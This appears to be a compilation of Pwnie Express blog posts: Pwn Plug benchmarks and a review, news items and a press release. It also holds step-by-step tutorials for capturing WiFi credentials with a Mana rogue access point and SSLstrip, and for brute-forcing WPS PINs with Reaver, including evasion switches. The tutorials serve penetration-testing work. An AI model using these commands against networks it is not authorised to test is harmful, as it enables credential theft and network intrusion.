Pwn Plug R2 vs. R3 – Head to Head

The recently released Pwn Plug R3 is a departure from its predecessors in a number of ways, but perhaps none as pronounced as the move away from the low-power ARM architecture. Rather than stick to ARM, which is primarily used in smartphones and tablets, Pwnie Express has embraced the latest Intel Next Unit of Computing (NUC) architecture to bring desktop-like performance to the Pwn Plug line for the first time.

But what does that mean, in practical terms? Just how much faster is the new R3 compared to its most recent predecessor, the R2?

File I/O Performance

All of the Pwn Plugs use flash storage of some type: in the case of the R2 it’s a micro SD card, and on the R3 an Intel 525 Series SSD. The R3 obviously will have the advantage here, given that micro SD cards are designed to be nothing more than cheap mass storage, but by how much?

To get a very rough idea of sequential performance we can simply write a large file to the drive with the common Unix tool “dd”, which will report its write speed upon completion. The following command will write a 512 MB file filled with zeros, and report how fast it performed the operation:

time dd if=/dev/zero of=test bs=8k count=62500

The results of even this simple test are staggering:

(chart: dd write speeds, R2 vs. R3)

The R2’s SD card can only manage a write speed of just over 12 megabytes per second, while the Intel SSD clocks in at an incredible 519 megabytes per second. There’s simply no contest: the R3’s storage technology is a generational leap above the R2.

Computational Performance

The R2 is powered by a Marvell Armada-370 processor clocked at 1.2 GHz, while the R3 has an Intel Celeron at 1.1 GHz. The casual observer may look at these numbers and think both processors would be around the same in terms of performance, since they are operating at roughly the same clock speed. But with vastly different CPU architectures like this, clock speed alone says almost nothing about relative performance.

To get a better idea of how these processors actually stack up, we can use a simple tool called “sysbench”, which is available in both the R2 and R3’s online package repositories. This tool will calculate prime numbers up to a user-defined value, putting continuous computational stress on the processor. The command to run the test with a prime limit of 5000 looks like this:

sysbench --test=cpu --cpu-max-prime=5000 run

The results, once again, are completely one-sided:

(chart: sysbench run times, R2 vs. R3)

The R3 is able to calculate 5000 prime numbers over 10 times faster than the R2, showing the stark contrast between the computational capabilities of the ARM chip versus its similarly-clocked Intel counterpart.
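
The two measurements above are easy to reproduce in code. The following Python block is an added example, not code from the post, from dd or from sysbench: it implements the trial-division prime count that the sysbench cpu test performs (the exact inner loop of sysbench is an assumption here; the work per candidate is the same kind), times it, and converts a dd block size and count plus the elapsed seconds reported by `time` into a write throughput in decimal megabytes per second, which is what the 12 MB/s and 519 MB/s figures above express.

```python
import math
import time

# GNU dd size suffixes: plain k/M/G are powers of 1024, kB/MB/GB are powers of 1000.
_DD_SUFFIXES = {
    "": 1, "b": 512,
    "k": 1024, "K": 1024, "kB": 1000,
    "M": 1024 ** 2, "MB": 1000 ** 2,
    "G": 1024 ** 3, "GB": 1000 ** 3,
}


def parse_dd_size(spec: str) -> int:
    """Turn a dd-style size such as '8k' or '1MB' into a byte count."""
    spec = spec.strip()
    i = 0
    while i < len(spec) and spec[i].isdigit():
        i += 1
    number, suffix = spec[:i], spec[i:]
    if not number or suffix not in _DD_SUFFIXES:
        raise ValueError(f"unrecognised dd size: {spec!r}")
    return int(number) * _DD_SUFFIXES[suffix]


def write_throughput_mb_s(bs: str, count: int, elapsed_seconds: float) -> float:
    """Throughput of 'dd bs=<bs> count=<count>' given the real time reported by `time`.

    Uses decimal megabytes (10^6 bytes), the unit dd itself prints.
    """
    if elapsed_seconds <= 0:
        raise ValueError("elapsed time must be positive")
    total_bytes = parse_dd_size(bs) * count
    return total_bytes / elapsed_seconds / 1_000_000


def count_primes(max_prime: int) -> int:
    """Count the primes in [2, max_prime] by trial division.

    Each candidate is divided by every integer up to its square root, so
    the cost grows with the limit; this is the same class of work the
    sysbench cpu test does for --cpu-max-prime.
    """
    count = 0
    for n in range(2, max_prime + 1):
        for d in range(2, math.isqrt(n) + 1):
            if n % d == 0:
                break
        else:
            count += 1
    return count


def time_prime_test(max_prime: int, runs: int = 3) -> float:
    """Best-of-N wall-clock seconds for count_primes(max_prime)."""
    best = float("inf")
    for _ in range(runs):
        start = time.perf_counter()
        count_primes(max_prime)
        best = min(best, time.perf_counter() - start)
    return best


if __name__ == "__main__":
    # Constructed numbers for the dd case: 512 MB written in 42 s.
    print(f"dd throughput: {write_throughput_mb_s('8k', 62500, 42.0):.2f} MB/s")
    print(f"primes up to 5000: {count_primes(5000)}")
    print(f"best of 3 runs: {time_prime_test(5000):.4f} s")
```

Run it on two machines and compare the best-of-three times rather than single runs; the best time is the least affected by background activity, which matters when a Plug is also running its usual services.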

Practical Benchmark

It’s surely clear that the R3 is a vastly more powerful machine than the R2, but some may make the case that the day-to-day usage of both devices is comparable enough that the raw power of each respective Plug is irrelevant.

To address that, let’s take a look at a valid real-world example. The infamous password cracker “John the Ripper” represents a practical demonstration of both raw computational power and rapid file operations. It just so happens that John the Ripper even includes a built-in benchmarking facility for its various hash formats, which can be accessed like so:

john --test

The benchmark shows how many hashes per second John can compute for each supported hash format on a particular piece of hardware. A higher number is better, as that means you can try more passwords in less time.

(charts: John the Ripper benchmark results, FreeBSD and OpenBSD formats, R2 vs. R3)

Verdict

In truth, there’s hardly even a competition here. The R2 is completely outclassed by its successor. Both the simplistic benchmarks and the practical John test prove the same fact: the Pwn Plug R3 is a quantum leap forward in raw power, which directly equates to better performance in the field.

The Pony Grows Up: Pwn Plug R3 Review

The PowerBase

November 11, 2014

By Tom Nardi

Over two years ago, we did a review of the first generation Pwn Plug: a little ARM box that looked enough like a power adapter for a printer that it could reasonably be hidden in a wiring closet or office, all the while snooping on the local network and reporting back to a remote operator. It was, in a word, revolutionary.

Not that the idea itself was actually new. People in the security industry had been talking about this kind of thing for years, and of course, anyone who’s ever seen a spy movie can probably envision a device that operates in a similar manner. But it had never been practical to put into the field with the bulky x86 systems that ruled computing. Once Linux on ARM became mainstream though, it didn’t take the outside the box thinkers of Pwnie Express long to create a security appliance right out of a James Bond movie.

But technology changes rapidly. An ARM computer you plugged into the wall and ran Linux on that cost “only” a few hundred dollars was an incredible feat in 2012; indeed, it was enough to build a whole new industry on. Now we have Raspberry Pis running off of 9V batteries for $35 at Radio Shack.

Can a Pwn Plug in 2014 make the same kind of waves the original did in 2012? Or have the industry, and technology, passed the concept by?

The Pwn Plug Line

For the uninitiated, the Pwn Plug line is advertised as the premier turn-key penetration testing device on the market. With the ability to establish a reverse shell both in and out of band (i.e. through the host network, or over cellular), the Pwn Plugs are an extremely easy way to get a back door into whatever network they happen to be connected to. With their small size and unobtrusive physical appearance, the Pwn Plugs are ideal for covert deployments and performing remote penetration tests without having to physically travel to the target.

Once the Pwn Plug has dialed home, the operator has access not only to the dizzying array of open source security tools which the Pwn Plug includes, but can use the included development environment to compile, or even develop, new software right from within the target network.

None of these individual features are particularly revolutionary taken on their own, but combining them all into one ready to go appliance is. The Pwn Plug isn’t so much about breaking totally new ground as combining methods and technologies into a cohesive product that saves the user the trouble of putting it all together themselves.

The hardware is off the shelf, and the software is (mainly) open source. What you pay for isn’t the product itself, but the combined knowledge and support of the Pwnie Express team.

Hardware

Ironically enough, for this latest version the Pwn Plug has switched back to the x86 platform that had hindered this sort of product for so long in the past. Instead of a comparatively anemic ARM device, the R3 is based on the Intel Next Unit of Computing (NUC). Sporting a 64 bit dual core 1.1 GHz CPU and 2 GB of RAM, the R3 could double as a small form factor desktop in a pinch.

While the performance boost is certainly welcome, arguably the biggest improvement of the R3 is the fact that it now features built-in wireless (WiFi and Bluetooth) hardware. The original Pwn Plug relied on external adapters for wireless support, which was…ungainly, to say the least. The R2 had built-in WiFi, but still required an external Bluetooth adapter. With the R3, both are now supported out of the box without having to plug anything in. Though some may take issue with the fact that the integrated wireless solution on the R3 precludes the use of external antennas, the reality is, most use cases will work fine with the built-in radios.

On the flip side, while the R3 finally integrates wireless, it loses the second Ethernet port that the R2 added. This is something of a step backwards, as it means you’ll now need to use an external Ethernet adapter to perform certain tasks, just like on the original Pwn Plug. Realistically, most users are probably more interested in wireless these days, so losing the dual Ethernet in favor of built-in wireless is unlikely to ruffle many feathers, but it was nice to have the option.


Hardware wise, there is no question that the R3 is easily the most powerful of the Pwn Plugs, and the internal wireless (lack of dual Ethernet notwithstanding) finally fixes one of the most glaring problems of its predecessors. Unfortunately there is one thing the R3 lacks which the earlier Plugs had in spades: the element of surprise.

Pulling the Plug

Without a doubt, one of the most revolutionary things about the original Pwn Plug was that it didn’t look anything like a traditional computer; it was a white box that plugged into the wall. It even came with stickers that made it look like a power adapter or an automatic air freshener. That was sort of the whole point: you could plug it into the wall and there was very little chance that anyone but the most astute would have thought something was out of the ordinary.

The R2 was not quite as stealthy as the original Plug, but thanks to its general shape and large external antenna, it could plausibly take on the appearance of an innocent wireless access point. It might have gotten more attention than the original Plug, but at least it wasn’t completely out of place.

But sadly the R3 doesn’t have either form of camouflage; it has the dubious honor of simultaneously looking in and out of place. On one hand, it doesn’t have the non-traditional shape of the original Plug, and on the other, it doesn’t look nearly as utilitarian as it should if it’s going with the R2’s plausible deniability defense.

With its sleek lines, front mounted USB port, and blinking LED activity light, the R3 looks more like a Roku than a penetration testing device. The thing’s even got HDMI (dual HDMI, at that).


Which makes the R3 sort of an odd addition to the Pwn Plug line. Is it still trying to be a covert device? Has Pwnie Express abandoned that line of logic in favor of simply delivering a turn-key penetration testing device? The documentation refers to the hardware as “portable” and “shippable”, but no longer calls the device a “drop-box” as in earlier Pwn Plug revisions.

Of course, it makes sense. The idea of attempting to hide an expensive piece of hardware in your target network was always a bit hokey. Certainly clever, but not terribly practical over the long term. But the idea of a small and portable IT penetration device with reverse shell capability isn’t only useful in the context of hiding it; you can just as easily ship it to a target and have them plug it into their network.

Remember, the use case for the Pwnie products is legitimate penetration testing, not breaking into networks illegally. Rather than having to send out an investigator every time a company or organization conducts a penetration test, they can simply ship a Pwn Plug to the target and have them hook it up to the network. The penetration test can then be done remotely, faster and cheaper than it could have been done otherwise.

Losing the pretext of the Pwn Plug being a covert hacking device is a bit of a let down on the surface, but realistically, it’s just a sign of Pwnie Express taking its products down a more mature and corporate-friendly direction. There are certain circles where a little box that looks like an air freshener just isn’t going to be taken seriously as a legitimate tool, and for those places, the R3 becomes a necessity.

Pwnix

On the software side, Pwnie Express has taken the world’s most popular security testing Linux distribution, Kali, and customized it to create Pwnix. Because it’s running on a Kali base, Pwnix includes essentially every worthwhile open source security tool in existence, and is constantly being revised with new tools and updates. Even if there’s a tool you want that isn’t included, thanks to Pwnix including a full fledged Linux environment and the R3 running on standard Intel x86 hardware, you can almost certainly install it without jumping through too many hoops.

Pwnix also includes a very slick web based user interface for configuring and updating the R3, as well as launching services and setting up reverse SSH shells.


The web UI is a very nice touch that really makes the Pwn Plug feel like a professional and cohesive product. It beats having to dive into the command line every time you want to clear some logs or change an IP address.

Missed Opportunities

In general the software environment is quite good, but there are a few obvious areas of improvement.

For example, for all the polish that has been put into the web UI, it seems like it could be utilized a bit better. The web UI only lets you start a paltry 3 services, and you can’t even do something as simple as a WiFi site survey with it. Even consumer grade routers let you scan for other APs from within their UIs these days.


Of course, given the immense amount of services and functions that the user could potentially want to access on their R3, it would be unreasonable to assume there could be a UI front-end for each one of them. Still, there are a few key services and functions that Pwn Plug operators would almost certainly use which could get a proper UI treatment.

As it stands, the web UI is something you would only visit on occasion. This seems an awful waste of potential, and hopefully something Pwnie will address with future software updates.

Conclusion

All in all, the Pwn Plug remains a remarkably complete turn-key penetration testing solution. The new hardware is not only more powerful than the previous versions of the hardware (as should be expected), but has an air of professionalism that its predecessors lacked. While it might not be the same type of “cowboy” style product the original Pwn Plug was, it certainly fills a niche and continues to push the Pwn Plug forward.

That said, it still isn’t perfect. While this version of the Pwn Plug requires fewer external devices than the original to operate to its full potential, having to plug in external GSM or Ethernet adapters is rather awkward. As with the previous Pwn Plugs, the off the shelf hardware that Pwnie Express chooses to use is adequate, but not always ideal. Given their success, it would be nice to see Pwnie Express invest in more custom-made devices rather than relying on hardware that’s already commercially available. They’ve done it in the past with the Power Pwn, but seem reluctant to try again.

But in the end, outside of the little nagging issues, there’s really not much to dislike about the R3. Previous Pwnie products have had something of an unfinished feel, or perhaps to put it a different way; previous Pwnie devices gave the impression they were still being actively developed and experimented with, even after you purchased them. But with the R3, the hardware and software has really come together into a product that feels complete.

With the R3 you get the distinct impression that not only has the product itself reached a new level of maturity, but so has the company behind it.

The Pwn Plug R3 is available now, directly from Pwnie Express for $995, with optional extended warranty service and web-based training.

(Original Article)

Shadow IT in Stores and Branches: How to Stay Compliant

InfoSecurity Magazine

October 22, 2014

By Bob Tarzey

Branches are where the rubber still hits the road for many organisations; where retailers still do most of their selling, where much banking is still carried out and where health care is often dispensed. However, for IT managers, branches are outliers, where rogue activity is hard to curb; this means branches can become security and compliance black spots.

Branch employees may see fit to make their lives easier by informally adding to the local IT infrastructure, for example installing wireless access points purchased from the computer store next door. Whilst such activity could also happen at HQ, controls are likely to be more rigorous. What is needed is an ability to extend such controls to branches, monitoring network activity, scanning for security issues and detecting non-compliant activity before it has an impact.

A proposition from Boston, USA-based vendor Pwnie Express should improve branch network and security visibility. Founded in 2010, Pwnie Express has so far received $5.1 million Series-A venture capital financing from Fairhaven Capital and the Vermont Seed Capital Fund. The name is a play on both Pony Express, the 19th century US mail system, and the Pwnie Awards, a competition run each year at the Black Hat conference to recognise the best discoverers of exploitable software bugs.

(Original Article)

Bypassing HSTS SSL with the Mana Toolkit

Anyone who’s attempted to use Moxie Marlinspike’s SSLstrip against recent browsers has no doubt run into HTTP Strict Transport Security (HSTS), a mechanism by which a website tells the browser that it must only ever be reached over SSL. This fixes the key problem with previous SSL deployments (and what made SSLstrip possible): the fact that the user had to know ahead of time whether the site they were visiting was using encryption.

When a user running a recent version of Chrome or Firefox visits an SSL secured site which has been forced down to plain HTTP with SSLstrip, it not only fails, but goes as far as informing the user their current Internet connection is potentially being tampered with by a third party.
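
The browser-side logic that makes this work is small enough to model directly. The following Python block is an added example, not code from the post or from any browser; it parses a Strict-Transport-Security header, keeps a per-host policy cache the way a browser does, and shows the decision that defeats SSLstrip: a plain http:// URL for a host with a cached policy is rewritten to https:// before any request leaves the machine, while a host the browser has never seen over HTTPS gets no upgrade (the gap that the preload list exists to close). The helper at the end flags policies that are weaker than they should be; the thresholds and the host names in the usage code are assumptions.

```python
from dataclasses import dataclass
from typing import Dict, List, Optional
from urllib.parse import urlsplit, urlunsplit

ONE_YEAR = 365 * 24 * 3600


@dataclass
class HstsPolicy:
    max_age: int
    include_subdomains: bool = False
    preload: bool = False


def parse_hsts(header: str) -> Optional[HstsPolicy]:
    """Parse a value such as 'max-age=31536000; includeSubDomains; preload'.

    Returns None when max-age is missing or non-numeric, which a browser
    treats as no policy at all (RFC 6797 requires max-age).
    """
    max_age: Optional[int] = None
    include_sub = preload = False
    for raw in header.split(";"):
        name, _, value = raw.strip().partition("=")
        name = name.strip().lower()
        value = value.strip().strip('"')
        if name == "max-age":
            if not value.isdigit():
                return None
            max_age = int(value)
        elif name == "includesubdomains":
            include_sub = True
        elif name == "preload":
            preload = True
    if max_age is None:
        return None
    return HstsPolicy(max_age, include_sub, preload)


class HstsStore:
    """Minimal model of a browser's HSTS cache: host -> policy."""

    def __init__(self) -> None:
        self.policies: Dict[str, HstsPolicy] = {}

    def learn(self, host: str, header: str, over_https: bool = True) -> None:
        # Browsers honour the header only on an HTTPS response, so a man in
        # the middle who has stripped TLS cannot plant or alter a policy.
        if not over_https:
            return
        policy = parse_hsts(header)
        if policy is None:
            return
        if policy.max_age == 0:          # max-age=0 tells the browser to forget the host
            self.policies.pop(host.lower(), None)
        else:
            self.policies[host.lower()] = policy

    def is_known_https(self, host: str) -> bool:
        host = host.lower()
        if host in self.policies:
            return True
        labels = host.split(".")
        for i in range(1, len(labels)):      # parent domains with includeSubDomains
            parent = self.policies.get(".".join(labels[i:]))
            if parent and parent.include_subdomains:
                return True
        return False

    def upgrade(self, url: str) -> str:
        """Rewrite http:// to https:// when a cached policy applies.

        This is the step that makes an SSLstrip-style downgrade fail: the
        browser never sends the plain-HTTP request the attacker is waiting for.
        """
        parts = urlsplit(url)
        if parts.scheme == "http" and self.is_known_https(parts.hostname or ""):
            return urlunsplit(("https",) + tuple(parts[1:]))
        return url


def policy_weaknesses(policy: HstsPolicy) -> List[str]:
    """Flag settings that leave a window for a downgrade (thresholds assumed)."""
    issues = []
    if policy.max_age < ONE_YEAR:
        issues.append("max-age shorter than one year")
    if not policy.include_subdomains:
        issues.append("includeSubDomains missing")
    if not policy.preload:
        issues.append("not eligible for the browser preload list")
    return issues


if __name__ == "__main__":
    store = HstsStore()
    store.learn("example.com", "max-age=31536000; includeSubDomains")   # assumed host
    print(store.upgrade("http://www.example.com/login"))   # upgraded to https://
    print(store.upgrade("http://never-seen.test/"))        # first visit: no policy yet
```

The first-visit gap is exactly the case the page describes: until a browser has seen one HTTPS response carrying the header, it has no reason to refuse plain HTTP, which is why sites that care ship the preload directive and get themselves onto the browsers’ built-in list.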

But thanks to the recently released “Mana Toolkit”, the SSLstrip technique is once again viable on modern operating systems and browsers. Combining an updated version of SSLstrip, some DNS trickery, and a turn-key rogue AP, Mana is an extremely effective solution for covertly capturing WiFi traffic.

Running Mana

Mana has just recently been added to the Kali Linux repositories, which means it’s automatically available to Pwnie devices running Pwnix by simply running:

apt-get install mana-toolkit

This will pull in quite a few dependencies required to get Mana running, and will drop you back to the command line once finished.

From there, navigate to the Mana directory located at /usr/share/mana-toolkit, and then enter the directory named run-mana. Here you’ll find a number of scripts used to control how Mana operates.


Of the available scripts, the following will be the most useful under normal circumstances:

start-nat-full.sh

Starts the rogue AP, routes client requests to the Ethernet network, and enables all of the tools included in Mana. This is the script you want to get Mana working as quickly as possible.

start-nat-simple.sh

Starts the rogue AP, but none of the tools. Use this script if you want to deploy your own tools against targets.

start-noupstream.sh

Starts the rogue AP without an Internet connection, complete with a fake captive portal login for attempting to capture victim credentials even if you’re offline.

The most common usage will be to run the full Mana suite, so we’ll look at that. While you can manually edit the configuration files under /etc/mana-toolkit, it isn’t necessary to get Mana up and running. Running the “start-nat-full.sh” script will launch Mana and start flooding the terminal with status info:

(screenshot of Mana status output)

Mana will now be advertising a wireless network named “Internet”, as well as attempting to spoof other networks as it sees clients probing for previously connected access points.

Compatible Sites

Mana includes the necessary configuration files to capture credentials on a number of popular sites, but of course not all are currently supported. Browsing the source via their official GitHub page shows Mana is already set up to capture login credentials from Facebook, Google, and Apple:

https://github.com/sensepost/mana/tree/master/apache/etc/apache2/sites-available

As Mana is still in development, additional sites and services are still being added. In the meantime, the developers suggest using the already available code as a template to customize your Mana installation for your specific needs and targets.

Reviewing Captured Data

The main Mana script dumps out a rather overwhelming amount of continually updating information, and it can be very difficult to interpret it as everything goes by. It’s therefore easier to manually check the SSLstrip logs to look for captured credentials than trying to read them from the script’s output.

The main SSLstrip log file is located at /var/lib/mana-toolkit/sslstrip.log, which holds all the previously SSL protected data that Mana managed to capture. Searching this file for usernames and passwords (try using grep to search for terms such as “pass”) can uncover some extremely interesting information.




WPS Cracking with Reaver

We’ve previously covered how ineffectual WEP encryption is for securing a wireless network, showing that the Pwn Plug R3 can easily break into a WEP network in less than one minute. But considering how old WEP is, that shouldn’t really come as much of a surprise. Most networks will now be running the much more robust WiFi Protected Access (WPA), with WEP running mainly on the older systems that haven’t been updated or maintained.

But while it’s not as trivial as breaking into a WEP network, WPA is not completely infallible. Here we will take a look at one of the methods used to crack into a WPA network, and some of the pitfalls you may encounter.

WPS Pin Attack

An often overlooked feature on many WiFi routers and access points is WiFi Protected Setup (WPS). This is a convenience feature that allows the user to configure a client device against a wireless network by pressing a button on both the access point and the client device (the client side “button” is often in software) at the same time. The devices trade information, and then set up a secure WPA link.

On the surface, this is a very clever feature. It allows less savvy users to establish a secure connection between their devices quickly and easily, and as it requires physical access to the hardware, it would seem relatively secure.

But a tool called Reaver has been designed to brute-force the WPS PIN exchange remotely, even if the physical button hasn’t been pressed on the access point.

While some newer devices are building in protection against this specific attack, the Reaver WPS exploit remains useful on many networks in the field.

Note: To be clear, WPS is the vulnerable system in this case, not WPA. If a network has WPS disabled (which they should, given the existence of tools such as this), it will be immune to the following attack.
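
The note above gives the fix, and the check is worth automating across a fleet. The following Python block is an added example, not code from the post or from hostapd: it parses a hostapd.conf-style file and reports whether the access point leaves WPS reachable. The keys it looks at are real hostapd.conf settings (wps_state, where 0 means WPS disabled; ap_setup_locked; and ap_pin, which enables the PIN method with a static PIN), but the sample configuration is constructed for the example and the finding strings are this example’s own.

```python
from typing import Dict, List

# Constructed sample of an exposed AP configuration (not from the page).
SAMPLE_EXPOSED_CONF = """\
interface=wlan0
ssid=branch-office
wpa=2
wpa_passphrase=CorrectHorseBatteryStaple
# WPS left on, setup unlocked, and a static PIN configured
wps_state=2
ap_setup_locked=0
ap_pin=12345670
"""


def parse_hostapd_conf(text: str) -> Dict[str, str]:
    """Parse key=value lines; '#' starts a comment and a later key wins."""
    settings: Dict[str, str] = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        key, sep, value = line.partition("=")
        if not sep:
            continue
        settings[key.strip()] = value.strip()
    return settings


def audit_wps(settings: Dict[str, str]) -> List[str]:
    """Return findings for a configuration that exposes WPS; empty means clean."""
    findings: List[str] = []
    wps_state = settings.get("wps_state", "0")
    if wps_state == "0":
        return findings               # WPS off: no PIN exchange to brute force
    findings.append(f"WPS enabled (wps_state={wps_state})")
    if settings.get("ap_setup_locked", "0") != "1":
        findings.append("AP setup not locked (ap_setup_locked=0)")
    if "ap_pin" in settings:
        findings.append("static AP PIN configured (ap_pin)")
    return findings


def harden_wps(settings: Dict[str, str]) -> Dict[str, str]:
    """Return a copy of the settings with WPS turned off and the static PIN removed."""
    hardened = dict(settings)
    hardened["wps_state"] = "0"
    hardened.pop("ap_pin", None)
    return hardened


def render_conf(settings: Dict[str, str]) -> str:
    """Serialize settings back to hostapd.conf syntax."""
    return "\n".join(f"{k}={v}" for k, v in settings.items()) + "\n"


if __name__ == "__main__":
    before = parse_hostapd_conf(SAMPLE_EXPOSED_CONF)
    for finding in audit_wps(before):
        print("finding:", finding)
    print(render_conf(harden_wps(before)))
```

Run the audit against every AP configuration you manage; an AP that reports no findings is outside the reach of the attack described in the rest of this post, while one that is merely “locked” still shows up, since the lock only makes the attack slower rather than impossible.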

 

Finding a Network

If you’ve read the previous tutorial on cracking into a WEP network, you’ll recognize the command used to get the hardware into monitor mode:

airmon-ng start wlan0

From here you could use airodump-ng to look for networks, but Reaver actually includes its own tool for finding vulnerable WPS implementations which is much more straightforward. To start it, run the following command:

wash -i mon0

The output will look something like this:

(screenshot of wash output)

This shows two networks which are, at least in theory, vulnerable to the WPS brute force attack Reaver uses. Note the “WPS Locked” column; this is far from a definitive indicator, but in general, you’ll find that APs which are listed as unlocked are much more likely to be susceptible to brute forcing. You can still attempt to launch an attack against a network which is WPS locked, but the chances of success aren’t very good.

Launching Reaver

Once you’ve found a network you wish to run the attack against, operating Reaver is very straightforward. The basic command needs only the local interface, channel, and BSSID to be specified. The command to launch Reaver against the “linksys” network above would look like this:

reaver -i mon0 -c 6 -b 00:23:69:48:33:95 -vv

The only part of the above command that might not be immediately obvious is “-vv”; this enables verbose output, which greatly helps when trying to gauge how well Reaver is (or is not) progressing.

Once you’ve started Reaver, you’ll start seeing output like this:

(screenshot of Reaver output)

This output shows that WPS pins are successfully being tried against the target (here we see 12345670 and 00005678 are being tested), and Reaver is operating normally.

Advanced Options

Ideally, the basic command works and the attack progresses as expected. But in reality, different manufacturers have been trying to implement protections against Reaver-style attacks, and additional options may be required to get the attack moving.

As an example, the following command adds a few optional switches that can help to get Reaver working on more picky devices:

reaver -i mon0 -c 6 -b 00:23:69:48:33:95 -vv -L -N -d 15 -T .5 -r 3:15

The core command hasn’t changed, the additional switches just change how Reaver behaves:

-L

Ignore locked WPS state.

-N

Don’t send NACK packets when errors are detected.

-d 15

Delay 15 seconds between PIN attempts.

-T .5

Set timeout period to half a second.

-r 3:15

After 3 attempts, sleep for 15 seconds.

This is by no means an exhaustive list of Reaver options, but it gives an idea of what kind of things you might want to try.

Attack Duration

Even under ideal conditions, Reaver can take a very long time to complete its run. There is an element of chance involved: the brute forcing could theoretically discover the PIN very quickly, but in general it is going to take many hours to even make a dent in the possible pool of PINs.

Luckily, Reaver keeps a progress log file automatically, so you can stop the attack at any time and resume whenever it’s convenient. Spending a few hours a day running Reaver against the same network should uncover its PIN and through that the WPA passphrase…eventually.



WTF: The Internet of Things?

– By Mark Davis –

Many of us are still getting used to the idea of being connected to the internet through our smartphones. But just as we’re coming to accept that it may be impossible to ever truly get away from the web, a bizarre new term seems to suggest even more ways to be plugged in.

The “internet of things.”

WTF is that?

It boils down to a future in which internet connections will be built into tiny devices in all manner of products — refrigerators, light bulbs, industrial equipment — allowing them to speak to each other without human control. Apps would monitor them.

Two key advancements — the spread of wireless technology and the advent of the cloud, where massive quantities of data can be stored and accessed with ease — have ushered in the era of IoT.

In fact, it’s already upon us: Today, you can buy a so-called smart refrigerator that, with the help of tiny sensors, will tell you when you’re low on milk or eggs. The local sporting goods store sells plenty of wearable fitness devices that measure heart rate, pace, the running-route topography and just about anything else you can think of, and uploads the info to the cloud. Smart meters, which control energy use in your home and communicate back to the utility for billing and monitoring purposes, are growing in popularity.

Wait, there’s more.

Waterbury-based Keurig Green Mountain has hinted at a future in which its ubiquitous coffee machines may be connected to the internet. The bottom of the recently released Keurig 2.0 has a dataport for unspecified future uses.

The next generation of smart refrigerators won’t just tell you what to put on your shopping list. They’ll share that information with the grocery store, and as you pull into the store’s sensor-filled parking lot, clerks will have gathered the goods for you.

At least, that’s the future envisioned by South Burlington-based Logic Supply, which has been in the IoT game since before the term was coined.

While IoT consumer goods get most of the media attention, Logic Supply is focused on industrial applications.

For example, to help a mining company improve efficiency and keep better track of its inventory, Logic Supply installed computers in the mining carts, sensors on their tracks and a computer to upload all the information gleaned from those gizmos into the cloud, where it can be accessed in real time.

While most of its business is national and international, Logic Supply has worked with some Vermont companies, including Pwnie Express, which provides security products to governments and private companies.

“I think you’re going to continue to see more and more commercial applications for systems and devices that are speaking to each other, reacting to what others are doing,” Logic Supply content manager Darek Fanton predicted. “I don’t see the downside. It’s nothing but helpful. It creates efficiencies.”

Last year, Cisco Systems issued a report that claimed 8.7 billion devices were connected to the internet in 2012 — and the networking equipment manufacturer predicted the number would explode to 50 billion by 2020. The financial firm Morgan Stanley countered with its own prediction: 75 billion.

The McKinsey Global Institute lists the IoT as a “disruptive technology” with a worldwide “economic impact” that could reach $6.2 trillion by 2025.

The founders of MicroGen Systems hope to secure a piece of that pie. UVM alum Robert Andosca and professor Junru Wu created the company in 2007, basing it on research they did at UVM. MicroGen Systems makes minuscule wireless devices that “scavenge” energy from vibrations, and use it to power tiny sensors, according to the university. The company is now based in Rochester, N.Y.

“The internet of things is pretty much a lot of sensors on all things, and all they’re doing is detecting something, whether it’s vibration, heat, humidity, some parameter or multiple parameters,” Andosca said. “And all that data is transmitted to a hub, a computer, and gets uploaded on the internet, so now the whole world is connected and becomes smarter. It’s really an amazing time we live in.”

Of course, you might wonder, Haven’t I seen all this before? Isn’t this the point in the sci-fi movie where the machines realize they no longer need humans, so they take all the power we have given to them and use it to exterminate us?

Rest easy, IoT advocates say. The interconnected machines still need human input, and can only act within parameters we set.

“There’s a fine line between something being a very popular buzzword, and something being terrifying,” Fanton of Logic Supply said. “An intelligent machine is different than a machine that is thinking for itself. An intelligent machine, you give it parameters. It can react to what’s happening, but it’s not sentient. It’s not making those decisions without some input from you at some point.”

Well, that certainly sounds reassuring. If one day you wind up battling some homicidal machine-robot, at least there’s someone local to blame.


Pwnie Express’s “Pwn Pulse” SaaS Security Assessment Solution Gets Top Scores in Rigorous Security Audit

TrustedSec Tests First-of-Its-Kind Enterprise Remote Location Intelligence Platform

Boston, MA, October 21, 2014 – Pwnie Express today announced that its new Pwn Pulse software as a service (SaaS) solution scored top marks in a comprehensive security audit performed by leading security-consulting firm TrustedSec, LLC. An end-to-end security assessment solution designed specifically for hard-to-reach distributed remote sites, Pwn Pulse delivers real-time wired and wireless asset discovery, continuous vulnerability scanning, pentesting, risk trending and alerting. The enterprise-class offering uses Pwnie Express’s easy-to-deploy sensors combined with central management to provide highly scalable continuous intelligence across remote locations.

“We were very impressed with how Pwn Pulse compared to the security of most other SaaS platforms,” said Dave Kennedy, President and CEO of TrustedSec. “Pwnie Express is clearly paving the way to a new baseline security profile for SaaS.”

Enterprises across verticals have lauded Pwnie Express’s new Pwn Pulse software as a service (SaaS) solution, calling it “groundbreaking” for its ability to easily provide visibility across their remote locations. “Pwn Pulse allows us to have true policies in regards to our networks and computers and a true way to test them,” said Eric Gilbert, Manager of IT Operations for Black, Mann & Gramm, L.L.P, who took part in the Beta program. “It gives us the ability to not only have the policies on hardening our hardware but also a way to verify that it’s where it’s supposed to be.”

Pwnie Express CTO and Founder Dave Porcello welcomed the TrustedSec audit, remarking: “We are thrilled that Pwn Pulse performed so well after being pummeled by some of the top web application security pentesters in the industry. The fact that we scored so impressively with zero critical or high priority vulnerabilities validates our commitment to delivering a best-of-breed differentiated remote security assessment solution.”

Pwnie Express’s new SaaS solution completes the entire enterprise security assessment lifecycle. The solution delivers a robust centralized management console. It also easily and seamlessly integrates with existing security information and event management (SIEM) products. Product benefits include:

o   Provides a cost-effective lightweight, non-intrusive and easy-to-deploy solution for remote locations

o   Delivers the most comprehensive asset discovery to remote sites

o   Extends vulnerability management to remote sites

o   Enables subsequent on-demand penetration testing to remote sites

o   Allows for easy anywhere multi-site deployment

o   Increases frequency and scope of remote site assessment

o   Expands awareness of wired, wireless, BYOD and rogue devices across all sites

o   Addresses PCI DSS and HIPAA compliance requirements at remote sites

o   Reduces travel and operational overhead required to do security testing

Availability: Pwn Pulse is generally available. For more information please contact sales@pwnieexpress.com or (855) 793-1337.


(Fast) WEP Cracking on the Pwn Plug R3

